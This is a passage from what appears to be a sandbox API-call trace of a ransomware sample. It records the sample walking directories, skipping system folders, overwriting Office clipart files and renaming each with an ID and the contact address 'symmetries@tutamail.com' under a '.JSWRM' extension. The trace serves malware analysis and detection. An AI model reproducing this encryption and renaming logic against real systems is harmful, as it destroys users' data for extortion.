hHeap=0x1e0000) returned 1 [0092.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0092.084] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5aa7bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5aa7bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4732, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01356_.WMF", cAlternateFileName="")) returned 1 [0092.084] lstrcmpiW (lpString1="NA01356_.WMF", lpString2=".") returned 1 [0092.084] lstrcmpiW (lpString1="NA01356_.WMF", lpString2="..") returned 1 [0092.084] lstrcmpiW (lpString1="NA01356_.WMF", lpString2="...") returned 1 [0092.084] lstrcmpiW (lpString1="NA01356_.WMF", lpString2="windows") returned -1 [0092.084] lstrcmpiW (lpString1="NA01356_.WMF", lpString2="recovery") returned -1 [0092.084] lstrcmpiW (lpString1="NA01356_.WMF", lpString2="perflogs") returned -1 [0092.084] lstrcmpiW (lpString1="NA01356_.WMF", lpString2="documents and settings") returned 1 [0092.084] lstrcmpiW (lpString1="NA01356_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.084] lstrcmpiW (lpString1="NA01356_.WMF", lpString2="system volume information") returned -1 [0092.084] lstrcmpiW (lpString1="NA01356_.WMF", lpString2="msocache") returned 1 [0092.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0092.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01356_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01356_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01356_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0092.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0092.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01356_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01356_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01356_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0092.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0092.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0092.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0092.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01356_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01356_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.086] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18226) returned 1 [0092.086] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4730) returned 0x24d210 [0092.086] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4730, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4730, lpOverlapped=0x0) returned 1 [0092.092] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.092] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4730, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4730, lpOverlapped=0x0) returned 1 [0092.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.092] CloseHandle (hObject=0x314) returned 1 [0092.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0092.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0092.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0092.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0092.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0092.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0092.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.093] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01356_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01356_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01356_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01356_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0092.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0092.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0092.093] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5aa7bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5aa7bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6bf6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01357_.WMF", cAlternateFileName="")) returned 1 [0092.093] lstrcmpiW (lpString1="NA01357_.WMF", lpString2=".") returned 1 [0092.093] lstrcmpiW (lpString1="NA01357_.WMF", lpString2="..") returned 1 [0092.093] lstrcmpiW (lpString1="NA01357_.WMF", lpString2="...") returned 1 [0092.094] lstrcmpiW (lpString1="NA01357_.WMF", lpString2="windows") returned -1 [0092.094] lstrcmpiW (lpString1="NA01357_.WMF", lpString2="recovery") returned -1 [0092.094] lstrcmpiW (lpString1="NA01357_.WMF", lpString2="perflogs") returned -1 [0092.094] lstrcmpiW (lpString1="NA01357_.WMF", lpString2="documents and settings") returned 1 [0092.094] lstrcmpiW (lpString1="NA01357_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.094] lstrcmpiW (lpString1="NA01357_.WMF", lpString2="system volume information") returned -1 [0092.094] lstrcmpiW (lpString1="NA01357_.WMF", lpString2="msocache") returned 1 [0092.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0092.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01357_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01357_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01357_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0092.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0092.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01357_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01357_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01357_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0092.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0092.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0092.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0092.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01357_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01357_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.094] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27638) returned 1 [0092.095] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6bf0) returned 0x24d210 [0092.095] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6bf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6bf0, lpOverlapped=0x0) returned 1 [0092.113] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.113] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6bf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6bf0, lpOverlapped=0x0) returned 1 [0092.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.114] CloseHandle (hObject=0x314) returned 1 [0092.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0092.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0092.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0092.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0092.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0092.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0092.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.115] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01357_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01357_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01357_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01357_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0092.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0092.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0092.115] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf61cf5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf61cf5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf61cf5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd6e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01358_.WMF", cAlternateFileName="")) returned 1 [0092.115] lstrcmpiW (lpString1="NA01358_.WMF", lpString2=".") returned 1 [0092.115] lstrcmpiW (lpString1="NA01358_.WMF", lpString2="..") returned 1 [0092.115] lstrcmpiW (lpString1="NA01358_.WMF", lpString2="...") returned 1 [0092.115] lstrcmpiW (lpString1="NA01358_.WMF", lpString2="windows") returned -1 [0092.116] lstrcmpiW (lpString1="NA01358_.WMF", lpString2="recovery") returned -1 [0092.116] lstrcmpiW (lpString1="NA01358_.WMF", lpString2="perflogs") returned -1 [0092.116] lstrcmpiW (lpString1="NA01358_.WMF", lpString2="documents and settings") returned 1 [0092.116] lstrcmpiW (lpString1="NA01358_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.116] lstrcmpiW (lpString1="NA01358_.WMF", lpString2="system volume information") returned -1 [0092.116] lstrcmpiW (lpString1="NA01358_.WMF", lpString2="msocache") returned 1 [0092.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0092.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01358_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01358_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01358_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0092.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0092.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01358_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01358_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01358_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0092.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0092.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01358_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01358_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.127] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3438) returned 1 [0092.127] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd60) returned 0x23fc98 [0092.127] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xd60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xd60, lpOverlapped=0x0) returned 1 [0092.131] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.131] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xd60, lpOverlapped=0x0) returned 1 [0092.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.131] CloseHandle (hObject=0x314) returned 1 [0092.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0092.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0092.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0092.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0092.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0092.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0092.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.132] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01358_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01358_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01358_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01358_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0092.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0092.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.134] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5f6d6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5f6d6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5f6d6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b74, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01361_.WMF", cAlternateFileName="")) returned 1 [0092.134] lstrcmpiW (lpString1="NA01361_.WMF", lpString2=".") returned 1 [0092.134] lstrcmpiW (lpString1="NA01361_.WMF", lpString2="..") returned 1 [0092.134] lstrcmpiW (lpString1="NA01361_.WMF", lpString2="...") returned 1 [0092.134] lstrcmpiW (lpString1="NA01361_.WMF", lpString2="windows") returned -1 [0092.134] lstrcmpiW (lpString1="NA01361_.WMF", lpString2="recovery") returned -1 [0092.134] lstrcmpiW (lpString1="NA01361_.WMF", lpString2="perflogs") returned -1 [0092.134] lstrcmpiW (lpString1="NA01361_.WMF", lpString2="documents and settings") returned 1 [0092.134] lstrcmpiW (lpString1="NA01361_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.134] lstrcmpiW (lpString1="NA01361_.WMF", lpString2="system volume information") returned -1 [0092.134] lstrcmpiW (lpString1="NA01361_.WMF", lpString2="msocache") returned 1 [0092.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0092.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01361_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01361_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01361_.WMF", 